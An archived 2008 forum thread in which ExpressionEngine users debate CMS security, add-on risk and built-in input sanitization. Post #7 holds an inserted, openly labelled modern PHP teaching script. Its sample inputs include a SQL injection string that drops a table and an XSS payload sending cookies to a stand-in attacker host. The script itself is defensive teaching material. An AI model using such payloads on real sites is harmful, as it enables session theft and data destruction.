ExpressionEngine CMS
Open, Free, Amazing


This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


When you say EE is secure, what do people do to circumvent that?

March 28, 2008 12:54am

  • #1 / Mar 28, 2008 12:54am

    stinhambo

    1268 posts

    I was thinking of telling a potential client about EE’s better security in comparison to a Joomla and Wordpress based site they were being quoted on, but then I realised I wouldn’t have many layman’s examples of how to explain this.

    Anyone got any marketable or easily explainable points on how EE is more secure?

  • #2 / Mar 28, 2008 1:37am

    John Fuller

    779 posts

    When a “hacker” finds an exploit, that information typically ends up being posted to security boards which track such things. When the developer of the exploited code learns of an exploit, the flaw is hopefully patched and a warning posted on the developer’s web site. This is the information that you would use to build a case of ExpressionEngine being more secure than Wordpress.

    For example, do a search at this site for both Wordpress and ExpressionEngine. Wordpress has developed a nice list but ExpressionEngine only has one entry from 2006. Do the same for Joomla and Drupal.

    What this list probably does not show is all the vulnerabilities of the add-ons that are typically used to build a site. Third party add-ons have no QA process for security and performance. Ellislab has set up a process for certification but I am not sure how popular that process has been.

    This actually brings up a very good point. Ellislab is accountable for anything they ship out the door. Due to their record, they have built a good deal of trust with their user base. If Ellislab were to do things that would result in a crash of their “trust stock” then the company could take a huge hit to their bottom line.

    3rd party developers don’t necessarily have this same level of trust or accountability. What does Joe Blow hobbyist developer care if he were to release an add-on which opens a back door to your application? If he is not getting paid then he may not even care enough about the add-on to patch it when a flaw is revealed.

    To go shopping for any add-on that might give your site cool functionality is a bit silly considering the risks. Of course, some sites have more risk than others and the risks vary. Problems could range anywhere from damage to a brand by unknowingly advertising Viagra to compromising sensitive data.

    So really, you have to ask this question not only of Wordpress and ExpressionEngine, but of every add-on to the site. Stick with trusted developers.

  • #3 / Mar 28, 2008 6:54am

    Mark Bowen

    12637 posts

    Add on to that the developers here are fantastic and a lot of the time do actually take a look at 3rd party add-ons, even if they aren’t going the certified route, and will lend a hand and tips to ensure that things stay that way. I think that is also tantamount to how fantastic a system EE really is. They have built such a fantastic code base that even programming newbies like me can get stuck into creating plugins and extensions that (hopefully mine) don’t cause any problems.

    Because the system is so well built and documented like an Encyclopaedia Britannica this makes it easier for developers to create items that won’t crash the system or cause any back door entry for any pesky blighters.

    So let’s see a good show of hands supporting the EE dev crew as they have done a fantastic job on this front.

    Best wishes,

    Mark

  • #4 / Mar 28, 2008 7:31am

    John Fuller

    779 posts

    Add on to that the developers here are fantastic and a lot of the time do actually take a look at 3rd party add-ons even if they aren’t going the certified route and will lend a hand and tips to ensure that things stay that way. I think that is also tantamount to how fantastic a system EE really is. They have built such a fantastic code base that even for programming newbies like me we can get stuck into creating plugins and extensions that (hopefully mine) don’t cause any problems.

    Because the system is so well built and documented like an Encyclopaedia Britannica this makes it easier for developers to create items that won’t crash the system or cause any back door entry for any pesky blighters.

    So let’s see a good show of hands supporting the EE dev crew as they have done a fantastic job on this front.

    Best wishes,

    Mark

    I disagree and I think this is false confidence. ExpressionEngine cannot save people from making mistakes. You have all the power to build something that will kill a server and open ExpressionEngine to attacks. Good documentation and helpful libraries do not make good programmers.

    There is nothing in ExpressionEngine that makes it safer from these problems (insecure or badly coded community add-ons) than any other system can be. ExpressionEngine does have a helpful developer library to pull from and some good docs, but there is nothing there that is not available to any other X developer working on X system.

    All of the information is available for you to be a master web developer, but that does not mean you are going to absorb that information and master it. “Newbies” are exactly the types of developers you have to watch out for when you are shopping for add-ons for your business applications. That is not to say a novice “hobbyist” cannot write solid code, but unless that person has built a high level of trust then developers should be highly suspect of anything from such developers that they put into their clients’ applications.

    Maybe Ellislab does give hints and help, but that is not a policy that my client can rely on. Certification goes a long way in solving this problem.

  • #5 / Mar 28, 2008 7:53am

    Mark Bowen

    12637 posts

    I know what you are saying John, but I was more referring to the fact that EE has so many great built-in methods that people can use, so they don’t go and hack together their own PHP code to do the same thing, and this makes it slightly safer.

    Of course developers, even great ones, can still make mistakes. I’m sure the (exceptionally simple 😊 ) plugins that I have made are not absolutely top-notch, but then none of them (hopefully) could be used to bring down an EE installation. What I was trying to say was that a lot of the CMS systems I have used in the past have had next to no level of developer access such as this, and it has literally been hacks to the core files all the way, which is just a joke.

    In this respect ExpressionEngine is fantastic.

    Didn’t want to give the wrong impression that’s all. I totally go along with everything you say there.

    Best wishes,

    Mark

  • #6 / Mar 28, 2008 8:35am

    Jared Farrish

    575 posts

    Well, security by obscurity is no security at all, right?

    Most of EE’s security comes from how it handles requests and the personal support people who encourage secure behavior. Security is a mindset and has much more to do with behavior than with a system configuration.

    The key is to build in security measures that are inherent, such as washing all POST and GET requests through a sanitizer, and then encourage all comers to utilize that inherent security.

    If it’s bypassed, though, you’re right back where you started, which is where the support policy comes in. Do not encourage insecure behavior, which reinforces the system’s ability to manage the security itself.

    Security is a reputational risk for a company like EE. They’ve built their business around professional clients with specific needs, but engineered a brilliant system for making it simple and effective to hook into that security (which is what Mark was getting at).

    The only security measure I haven’t seen emphasized by EE is putting the system folder below the root folder, where it could never be accessed directly by external means.

    Of course, htaccess can provide non-local security measures (such as not allowing looking into directories), but I would imagine EE takes the point of view that the decision to do so would be in the developer’s hands, who would know the necessity.

    BTW, this is not related, but talking about security as a mindset, if you have never heard of or read Bruce Schneier’s Crypto-Gram newsletter, I highly recommend it:

    http://www.schneier.com/crypto-gram.html

  • #7 / Mar 28, 2008 10:10am

    Derek Jones

    7561 posts

    I disagree and I think this is false confidence. ExpressionEngine cannot save people from making mistakes. You have all the power to build something that will kill a server and open ExpressionEngine to attacks. Good documentation and helpful libraries do not make good programmers.

    While your statement is mostly true, ExpressionEngine does do a number of things behind the scenes that protect from the most common PHP security exploits. URL sanitization, disabling of register_globals, some basic protections for input, CSRF prevention via the Secure Forms feature, which is enabled by default. Sanitized file uploads, enabled by default. All of that without you having to use any of the libraries or tools built in for additional safety and security, such as the database insert and update methods that automatically prep and escape your data, XSS sanitization, and so on.
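    The protections named in the last two posts (washing request input, escaped database writes, CSRF prevention in the style of Secure Forms, sanitized uploads, XSS output encoding) are generic PHP practices rather than anything EE-specific, and the following script shows each as a vulnerable-versus-hardened pair. It is an added example, not ExpressionEngine's own code and not written by either poster; it assumes PDO with the SQLite driver so it runs offline, and every function name, table name and sample input in it is hypothetical and constructed for illustration.

```php
<?php
// Added example, not ExpressionEngine's own code. Demonstrates generic PHP
// protections discussed in the thread against an in-memory SQLite database.
// Function and table names are hypothetical; inputs are constructed.
declare(strict_types=1);

// Constructed attacker-style POST, as a browser would submit it.
$post = [
    'author' => "Mallory', 'x'); DROP TABLE comments; --",
    'body'   => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
];

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)');

// Vulnerable: SQL assembled from raw request data. The author value closes the
// INSERT and appends DROP TABLE; pdo_sqlite's exec() runs both statements.
function insertVulnerable(PDO $db, array $post): void
{
    $db->exec("INSERT INTO comments (author, body) VALUES ('{$post['author']}', '{$post['body']}')");
}

// Hardened: a prepared statement binds the values as data, never as SQL text.
function insertHardened(PDO $db, array $post): void
{
    $stmt = $db->prepare('INSERT INTO comments (author, body) VALUES (:author, :body)');
    $stmt->execute([':author' => $post['author'], ':body' => $post['body']]);
}

// XSS: encode on output so a stored <script> is rendered as text, not executed.
function renderComment(array $row): string
{
    $esc = fn(string $s) => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p><b>' . $esc($row['author']) . '</b>: ' . $esc($row['body']) . '</p>';
}

// CSRF: a random per-form token kept server-side. A POST is accepted only if it
// echoes a known token, and the token is consumed so it cannot be replayed.
function issueFormToken(array &$session): string
{
    $token = bin2hex(random_bytes(32));
    $session['form_tokens'][$token] = time();
    return $token;
}

function validateFormToken(array &$session, array $post): bool
{
    $sent = (string) ($post['csrf_token'] ?? '');
    foreach (array_keys($session['form_tokens'] ?? []) as $known) {
        if (hash_equals($known, $sent)) {
            unset($session['form_tokens'][$known]);   // single use
            return true;
        }
    }
    return false;
}

// Uploads: strip path components, keep a conservative character set, and allow
// exactly one extension from an allowlist, so "shell.php.jpg" is rejected.
function sanitizeUploadName(string $name, array $allowed = ['jpg', 'png', 'gif', 'pdf']): ?string
{
    $base  = basename(str_replace('\\', '/', $name));
    $base  = preg_replace('/[^A-Za-z0-9._-]/', '_', $base);
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '' || !in_array(strtolower($parts[1]), $allowed, true)) {
        return null;
    }
    return $parts[0] . '.' . strtolower($parts[1]);
}

// --- Walk-through ------------------------------------------------------------
try {
    insertVulnerable($db, $post);
} catch (PDOException $e) {
    // Whether the driver drops the table or errors out, raw input reached the
    // SQL engine as code; that is the defect the prepared statement removes.
}
$tableGone = $db->query("SELECT name FROM sqlite_master WHERE name = 'comments'")->fetch() === false;
echo 'comments table dropped by vulnerable insert: ' . ($tableGone ? 'yes' : 'no') . "\n";

$db->exec('CREATE TABLE IF NOT EXISTS comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)');
insertHardened($db, $post);
foreach ($db->query('SELECT author, body FROM comments') as $row) {
    echo renderComment($row) . "\n";   // <script> appears as &lt;script&gt;
}

$session = [];                                     // stands in for $_SESSION
$token   = issueFormToken($session);
echo 'forged POST without token accepted: ' . (validateFormToken($session, $post) ? 'yes' : 'no') . "\n";
echo 'genuine POST accepted: ' . (validateFormToken($session, ['csrf_token' => $token]) ? 'yes' : 'no') . "\n";
echo 'replayed token accepted: ' . (validateFormToken($session, ['csrf_token' => $token]) ? 'yes' : 'no') . "\n";

foreach (['../../system/config.php', 'shell.php.jpg', 'photo.JPG'] as $upload) {
    echo "$upload -> " . (sanitizeUploadName($upload) ?? 'rejected') . "\n";
}
```

    Run it with `php example.php` (PHP 7.4 or later with pdo_sqlite). The point of the walk-through is that none of these defences depend on the CMS: whether or not a framework washes input for you, an add-on that builds its own SQL strings or echoes raw fields back to the page has bypassed the framework's protections, which is exactly the situation John and Jared describe.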

  • #8 / Mar 28, 2008 10:14am

    Mark Bowen

    12637 posts

    Derek you said what I was trying to say! Been having a problem with words all day 😊

    Sorry for that John. Must install a dictionary and thesaurus in this small head of mine 😉

    Best wishes,

    Mark

  • #9 / Mar 28, 2008 11:08am

    Mark Bowen

    12637 posts

    Well with all this talk about security, what just happened to the ExpressionEngine site? Was down for around 10 minutes just then.

    Nothing bad I hope?

    Best wishes,

    Mark

  • #10 / Mar 28, 2008 12:07pm

    Brian M.

    529 posts

    What this list probably does not show is all the vulnerabilities of the add-ons that are typically used to build a site. Third party add-ons have no QA process for security and performance. Ellislab has set up a process for certification but I am not sure how popular that process has been.

    I’m curious about this. As far as I know there’s only been one certified third party module released, hasn’t there? I know I personally haven’t really considered certifying the little things I’ve released because the number of people actually using them is so small, as is my spare time 😉

    It probably would be a good experience however, as I’m sure it would turn up quite a few things I should be doing, or things that I am doing incorrectly…
